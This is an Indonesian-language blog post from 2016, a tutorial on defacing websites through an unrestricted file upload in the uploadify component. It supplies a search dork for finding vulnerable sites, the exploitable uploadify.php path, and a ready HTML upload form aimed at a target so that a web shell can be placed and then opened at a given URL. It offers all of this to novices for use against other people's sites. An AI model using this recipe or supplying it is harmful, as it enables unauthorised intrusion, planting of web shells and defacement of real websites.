Senin, 21 Maret 2016

Tutorial Deface Dengan Uploadify

Selamat Datang Di Blog Saya

Nih Saya Saya Nge Share Tutorial Deface Dengan Uploadify :v .

Maaf Kalau Sudah Tau Exploit ini , Soalnya Nih Exploit Udah Lama

Biarkan Para Newbie Berkreasi :D

OK Langsung Aja Ke Tempat Perkara Kejadian .




Dork:
inurl:/uploadify/ intitle:index of ( Ini Cuman Dork Default , Kembangin Aja Sendiri Biar Dapat Banyak )

Kalau Udah Dapat Pake Exploit Di Bawah

Exploit: target/(path)/uploadify/uploadify.php

Kalau Webnya Tdk Ada Gambarnya (blank) Berarti Webnya Vulnerable

Kalau Udah Dapat Copy Dibawah Ini Langsung CSRF nya

CSRF :

<form
action="http://target.co.li/themes/zicepanel/components/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>

Klau Sudah Di Upload , Klau Keluar Tanda 1 Berarti Berhasil , Tetapi Klau Blank . Cari Target Lain


Path Shell Yang Sudah Di Upload

www.target.com/shellkamu.php


Ok Sekian Dan Terima Kasih


Facebook : https://www.facebook.com/marselERROR

Forum      : phantom-ghost.org

Fanspage : https://www.facebook.com/Ghosts.phtml